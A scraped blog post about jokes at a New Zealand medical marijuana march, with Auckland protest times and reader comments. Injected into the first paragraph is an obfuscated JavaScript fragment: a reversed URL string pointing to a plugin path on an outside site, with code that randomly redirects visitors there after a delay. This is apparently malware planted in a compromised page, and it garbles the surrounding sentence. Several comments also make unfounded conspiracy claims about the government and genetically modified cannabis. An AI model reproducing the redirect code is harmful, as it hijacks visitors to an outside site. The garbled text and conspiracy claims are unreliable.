Megaphone Jokes At NZ Medical Marijuana March LOL!

Man that was a shitload of fun! I crack me up 🙂 It’s medicinal 😉
I hope toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to see you all at J Day AND The John Key Stand Down Protest this Saturday in Auckland!

12pm Aotea Square for the March,

4:20pm Albert Park for J Day

Youtube Channel

8 thoughts on “Megaphone Jokes At NZ Medical Marijuana March LOL!”

  1. Billy Merritt says:

    I am a hundred percent Pro legalization Nationwide I do not do it but I do not feel that anyone has the right to tell anybody how to treat their body specially not the government,… all feel the same way at moonshine Valley Farms in Oklahoma

  2. Jeremy Hawkins says:

    The fact is that no such thing is illegal plans. mother earth own the plan not leaders. why the goverment pot it illegal because they lose money and can not make money and the goverment want you dead so they can still your money and take everything.

  3. jaceNZ75 says:

    it will be the only reason people vote in the next elections.. scumbags. legalize because who wants a doctor to tell them their not eligible because they don't have cancer or some genetic disorder. when its main uses had nothing to do with cancers……   Your Orsum Vinny… Keep up the fight..


    didnt Susan Aurbet


    didnt Susan Aurbet become a saint?


    she is the mother of our moral sociaty she smoothed things between maori and euro's how many times? took in babies, built hospitals, roads, orphanages etc all paid for with what would be today considerd b class manufacture and supply on an international scale? the rewards of legal cannabis back then you are all still able to enjoy now which is in fact new zealand itself would not have had been able to substain through that hard time whithout Suzan or cannabis. so if you love or hate it if you are a kiwi you owe your quality of life to cannabis as much as james cook for his sailing ability or maui for slowing the sun.

  7. 47queenbee says:

    medicinal, recreational ,whatevercal just bloody hurry up and legalise south auckland would be the new CBD of Aotearoa jobs and money for everyone and a booming economy power to the people!

  8. TheFraudwatch says:

    Jim, once again I will tell you there is something weird going on with marijuana. It is not the same weed as it was, it is GM weed. Look at who has most research and patents on it (Israel), and this GM weed is getting promoted and being used by many "mainstream" people.
    I have almost 35 years experience growing my own stock which is not tainted by the "new" breeds, and the effects are different. You laugh your ass off like in a Cheech and Chong movie, not sit in a vegetative state with no energy. I think this new weed is a delivery system for something else.
    The people who promote it inhale and immediately exhale, not like the old days where you hold that smoke in as long as you can. People like this woman are promoting weed (

    Remember Farganne says to destroy free will the people have to do it themselves. As always, keep vigilant

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